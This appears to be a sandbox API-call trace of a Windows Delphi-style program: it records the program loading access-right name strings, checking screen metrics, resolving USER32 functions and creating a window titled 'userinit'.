[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a3e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a3e580*="THREAD_QUERY_INFORMATION") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a3e570*="THREAD_SET_INFORMATION") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a3e560*="THREAD_SET_CONTEXT") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a3e550*="THREAD_GET_CONTEXT") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a3e540*="THREAD_SUSPEND_RESUME") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a3e530*="THREAD_TERMINATE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a3e520*="THREAD_ALL_ACCESS") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e500*="STANDARD_RIGHTS_WRITE") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e4f0*="STANDARD_RIGHTS_READ") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0090.561] SysReAllocStringLen (in: pbstr=0x2a3e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e4d0*="DELETE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e4c0*="READ_CONTROL") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e4b0*="WRITE_OWNER") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e4a0*="WRITE_DAC") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a3e490*="PROCESS_QUERY_INFORMATION") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a3e480*="PROCESS_SET_INFORMATION") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a3e470*="PROCESS_SET_QUOTA") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a3e460*="PROCESS_CREATE_PROCESS") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a3e450*="PROCESS_DUP_HANDLE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a3e440*="PROCESS_VM_WRITE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a3e430*="PROCESS_VM_READ") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a3e420*="PROCESS_VM_OPERATION") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a3e410*="PROCESS_SET_SESSIONID") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a3e400*="PROCESS_CREATE_THREAD") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a3e3f0*="PROCESS_TERMINATE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e3e0*="PROCESS_ALL_ACCESS") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e3b0*="STANDARD_RIGHTS_READ") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e390*="DELETE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e380*="READ_CONTROL") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e370*="WRITE_OWNER") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e360*="WRITE_DAC") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a3e350*="PERM_FILE_CREATE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a3e340*="PERM_FILE_WRITE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a3e330*="PERM_FILE_READ") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e310*="STANDARD_RIGHTS_WRITE") returned 1
[0090.562] SysReAllocStringLen (in: pbstr=0x2a3e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e300*="STANDARD_RIGHTS_READ") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e2e0*="DELETE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e2d0*="READ_CONTROL") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e2c0*="WRITE_OWNER") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e2b0*="WRITE_DAC") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a3e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a3e290*="PRINTER_ACCESS_USE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a3e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a3e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a3e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e250*="PRINTER_ALL_ACCESS") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a3e240*="PRINTER_EXECUTE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a3e230*="PRINTER_WRITE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a3e220*="PRINTER_READ") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e210*="PRINTER_ALL_ACCESS") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e200*="DELETE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e1f0*="READ_CONTROL") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e1e0*="WRITE_OWNER") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e1d0*="WRITE_DAC") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a3e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a3e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a3e1a0*="SC_MANAGER_LOCK") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a3e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a3e180*="SC_MANAGER_CONNECT") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a3e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e140*="STANDARD_RIGHTS_WRITE") returned 1
[0090.563] SysReAllocStringLen (in: pbstr=0x2a3e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e130*="STANDARD_RIGHTS_READ") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e120*="STANDARD_RIGHTS_ALL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e110*="DELETE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e100*="READ_CONTROL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e0f0*="WRITE_OWNER") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e0e0*="WRITE_DAC") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a3e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a3e0c0*="SERVICE_STOP") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a3e0b0*="SERVICE_START") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a3e0a0*="SERVICE_QUERY_STATUS") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a3e090*="SERVICE_QUERY_CONFIG") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a3e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a3e070*="SERVICE_INTERROGATE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a3e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a3e050*="SERVICE_CHANGE_CONFIG") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e040*="SERVICE_ALL_ACCESS") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e020*="STANDARD_RIGHTS_WRITE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e010*="STANDARD_RIGHTS_READ") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e000*="STANDARD_RIGHTS_ALL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3dff0*="DELETE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dfe0*="READ_CONTROL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dfd0*="WRITE_OWNER") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dfc0*="WRITE_DAC") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a3dfb0*="KEY_SET_VALUE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a3dfa0*="KEY_CREATE_LINK") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a3df90*="KEY_CREATE_SUB_KEY") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a3df80*="KEY_NOTIFY") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a3df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a3df60*="KEY_QUERY_VALUE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3df40*="STANDARD_RIGHTS_WRITE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a3df30*="STANDARD_RIGHTS_READ 2") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a3df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3df10*="DELETE") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3df00*="READ_CONTROL") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3def0*="WRITE_OWNER") returned 1
[0090.564] SysReAllocStringLen (in: pbstr=0x2a3dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dee0*="WRITE_DAC") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a3ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a3dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a3deb0*="DESKTOP_JOURNALRECORD") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a3dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a3de90*="DESKTOP_HOOKCONTROL") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a3de80*="DESKTOP_CREATEWINDOW") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a3de70*="DESKTOP_CREATEMENU") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a3de60*="DESKTOP_READOBJECTS") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a3de50*="DESKTOP_ENUMERATE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3de30*="STANDARD_RIGHTS_WRITE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3de20*="STANDARD_RIGHTS_READ") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3de10*="STANDARD_RIGHTS_ALL") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3de00*="DELETE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ddf0*="READ_CONTROL") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dde0*="WRITE_OWNER") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ddd0*="WRITE_DAC") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a3ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a3ddb0*="WINSTA_READSCREEN") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a3dda0*="WINSTA_READATTRIBUTES") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a3dd90*="WINSTA_EXITWINDOWS") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a3dd80*="WINSTA_ENUMERATE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a3dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a3dd60*="WINSTA_CREATEDESKTOP") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a3dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a3dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3dd10*="STANDARD_RIGHTS_READ") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a3dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dcf0*="READ_CONTROL") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a3dce0*="SI_ACCESS_SPECIFIC") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dcd0*="WRITE_DAC") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a3dcc0*="FILE_DELETE") returned 1
[0090.565] SysReAllocStringLen (in: pbstr=0x2a3dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a3dcb0*="FILE_DELETE_CHILD") returned 1
[0090.566] GetDeviceCaps (hdc=0x2b010799, index=12) returned 32
[0090.566] GetDeviceCaps (hdc=0x2b010799, index=14) returned 1
[0090.566] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.566] LoadStringA (in: hInstance=0x2950000, uID=0xfeed, lpBuffer=0x12f004, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf
[0090.566] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4
[0090.566] LoadStringA (in: hInstance=0x2950000, uID=0xfeed, lpBuffer=0x12f004, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf
[0090.566] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3
[0090.566] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0090.566] GetProcAddress (hModule=0x757b0000, lpProcName="IsHungAppWindow") returned 0x757e7195
[0090.566] GetProcAddress (hModule=0x757b0000, lpProcName="HungWindowFromGhostWindow") returned 0x757d61f5
[0090.566] GetProcAddress (hModule=0x757b0000, lpProcName="GhostWindowFromHungWindow") returned 0x757ba561
[0090.567] GetClassInfoA (in: hInstance=0x2950000, lpClassName="TApplication", lpWndClass=0x12f42c | out: lpWndClass=0x12f42c) returned 0
[0090.567] RegisterClassA (lpWndClass=0x2a3cf00) returned 0x1bc160
[0090.567] GetSystemMetrics (nIndex=0) returned 1440
[0090.567] GetSystemMetrics (nIndex=1) returned 900
[0090.567] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2950000, lpParam=0x0) returned 0x16019c
